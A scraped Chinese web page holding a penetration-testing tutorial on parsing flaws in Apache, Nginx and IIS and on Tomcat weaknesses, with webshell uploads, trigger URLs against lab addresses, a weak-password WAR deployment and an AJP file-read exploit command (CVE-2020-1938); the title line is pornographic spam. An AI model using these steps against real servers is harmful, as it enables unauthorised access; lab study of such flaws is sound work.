日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長(zhǎng)提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請(qǐng)做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線(xiàn)咨詢(xún)客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

常見(jiàn)組件漏洞

 

常?組件安全

常?組件

操作系統(tǒng)
 windows、linuxWeb 容器 Apache、Tomcat、Nginx、IIS中間件 php、JAVA、Python、perl數(shù)據(jù)庫(kù) MySQL、Oracle、SQL Server、Access、redis其他組件 phpStudy、Weblogic、JBoss開(kāi)發(fā)框架 s2、thinkphp、vue

關(guān)注的問(wèn)題

1. 組件與漏洞名稱(chēng)
2. 影響版本3. 漏洞的檢測(cè)4. 漏洞的復(fù)現(xiàn)5. 漏洞的利?(漏洞場(chǎng)景、?具)6. 修復(fù)?案

 

Apache

Apache 解析漏洞

在1.x 和2.x 的版本中。

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

上傳png圖片:

常見(jiàn)組件漏洞

 

上傳一句話(huà)木馬:

yjh.php

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

上傳失敗!

常見(jiàn)組件漏洞

 

修改文件名:

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

上傳成功!

常見(jiàn)組件漏洞

 

蟻劍連接:

http://192.168.10.128/upload/yjh.php.wenxin
常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

getShell成功!

問(wèn)題原因:

yjh.php.wenxin Apache 會(huì)當(dāng)做PHP ?件來(lái)解析。
Apache 從右側(cè)向左解析后綴名。
Apache/2.2.25 (Win32) mod_ssl/2.2.25 OpenSSL/0.9.8y PHP/5.2.17

Nginx

Nginx - 空字節(jié)漏洞

影響版本:

nginx 0.5.*
nginx 0.6.*
nginx 0.7 <= 0.7.65
nginx 0.8 <= 0.8.37

環(huán)境:

常見(jiàn)組件漏洞

 

運(yùn)行nginx:

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

漏洞觸發(fā):

nginx version: nginx/0.7.65
http://192.168.10.128/info.png
http://http://192.168.10.128/info.png%00.php

 

常見(jiàn)組件漏洞

 

Nginx - 解析漏洞

解析圖???

與PHP-CGI 有關(guān) cgi.fix_pathinfo

啟動(dòng)漏洞環(huán)境

常見(jiàn)組件漏洞

 

 Docker-compose up -d

 

192.168.10.130

常見(jiàn)組件漏洞

 

制作圖片木馬:

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

上傳:

常見(jiàn)組件漏洞

 

漏洞觸發(fā):

http://192.168.10.130/uploadfiles/6996efdd38b0767328bdfc1bbe7b932f.png/.php

 

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

nginx 版本

nginx/1.17.4

 

常見(jiàn)組件漏洞

 

Nginx - ?件路徑解析漏洞 - CVE-2013-4547

影響版本

Nginx 0.8.41 ~ 1.4.3
Nginx 1.5.0 ~ 1.5.7

漏洞環(huán)境

登陸docker 環(huán)境

漏洞觸發(fā)

# 上傳圖???
[1_yjh.jpg ] // .jpg后面有一個(gè)空格
http://192.168.16.100:8080/uploadfiles/1_yjh.png
http://192.168.16.100:8080/uploadfiles/1_yjh.png[0x20][0x00].php

 

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

其他:

常見(jiàn)組件漏洞

 

IIS

IIS 6.0 解析漏洞

漏洞環(huán)境

Windows 2003

// time.asp
<%=time()%>

 

常見(jiàn)組件漏洞

 

分號(hào)?件名截?cái)?/p>

time.asp
time.asp;.jpghttp://10.10.10.233:8000/time.asp;.jpg

 

常見(jiàn)組件漏洞

 

*.asp ?錄解析錯(cuò)誤

time.jpg
/1.asp/time.jpg		//time.asp--->time.jpg
http://10.10.10.233:8000/1.asp/time.jpg

 

常見(jiàn)組件漏洞

 

time.jpg放在1.asp下被當(dāng)做.asp來(lái)解析!

 

IIS 7.0/7.5 解析漏洞

漏洞環(huán)境

Windows 2008
IIS+PHP

漏洞的觸發(fā)

http://192.168.16.193:8000/index.png
http://192.168.16.193:8000/index.png/.php

 

常見(jiàn)組件漏洞

 

漏洞防護(hù)

PHP-CGI
1. cgi.fix_pathinfo = 0
2. 處理映射程序|編輯模塊映射|請(qǐng)求限制|映射|對(duì)勾

 

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

Tomcat

Tomcat 的安裝與配置

直接解壓

配置環(huán)境變量

C:Program FilesJavajdk1.8.0_131
JAVA_HOME:C:Program FilesJavajdk1.8.0_131
Path:%JAVA_HOME%bin;%JAVA_HOME%jrebin;

啟動(dòng)Tomcat:

C:apache-tomcat-8.5.32bin>startup.bat

 

常見(jiàn)組件漏洞

 

nmap 掃描端?

sudo nmap -A -p- 192.168.10.130

 

常見(jiàn)組件漏洞

 

開(kāi)啟Tomcat 管理控制臺(tái)manager 遠(yuǎn)程訪(fǎng)問(wèn)

/webApps/manager/META-INF/context.xml

 

常見(jiàn)組件漏洞

 

配置管理控制臺(tái)賬密

/conf/tomcat-users.xml

 

常見(jiàn)組件漏洞

 

弱?令到GetShell

使? tomcat/tomcat ,登錄 Manager App 。

核?思路:通過(guò)管理控制臺(tái)部署Web 應(yīng)?,Web 應(yīng)?就是后?!

將jsp ?件打包

jar cvf jshell.war jshell.jsp
http://192.168.16.193:8080/jshell/jshell.jsp

大馬:jshell.jsp

常見(jiàn)組件漏洞

 

部署:

常見(jiàn)組件漏洞

 

大馬密碼:

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

AJP LFI - CVE-2020-1938

2020年1?6?,國(guó)家信息安全漏洞共享平臺(tái)(CNVD)收錄了Apache Tomcat?件包含漏洞(CNVD-2020-10487,對(duì)應(yīng)CVE-2020-1938)。攻擊者利?該漏洞,可在未授權(quán)的情況下遠(yuǎn)程讀取特定?錄下的任意?件。

由于Tomcat 默認(rèn)開(kāi)啟的AJP 服務(wù)(8009 端?)存在?處?件包含缺陷,攻擊者可構(gòu)造惡意的請(qǐng)求包進(jìn)??件包含操作,進(jìn)?讀取受影響Tomcat 服務(wù)器上的Web?錄?件。

影響版本

tomcat 6
tomcat 7 < 7.0.100
tomcat 8 < 8.5.51
tomcat 9 < 9.0.31

漏洞利?

./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.16.193 -p 8009 -f WEBINF/web.xml

腳本下載地址:

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

創(chuàng)建hello.txt,并讀取:

常見(jiàn)組件漏洞

 


常見(jiàn)組件漏洞

 

=== Well Done ===

分享到:
標(biāo)簽:漏洞
用戶(hù)無(wú)頭像

網(wǎng)友整理

注冊(cè)時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊(cè)賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過(guò)答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫(kù),初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績(jī)?cè)u(píng)定2018-06-03

通用課目體育訓(xùn)練成績(jī)?cè)u(píng)定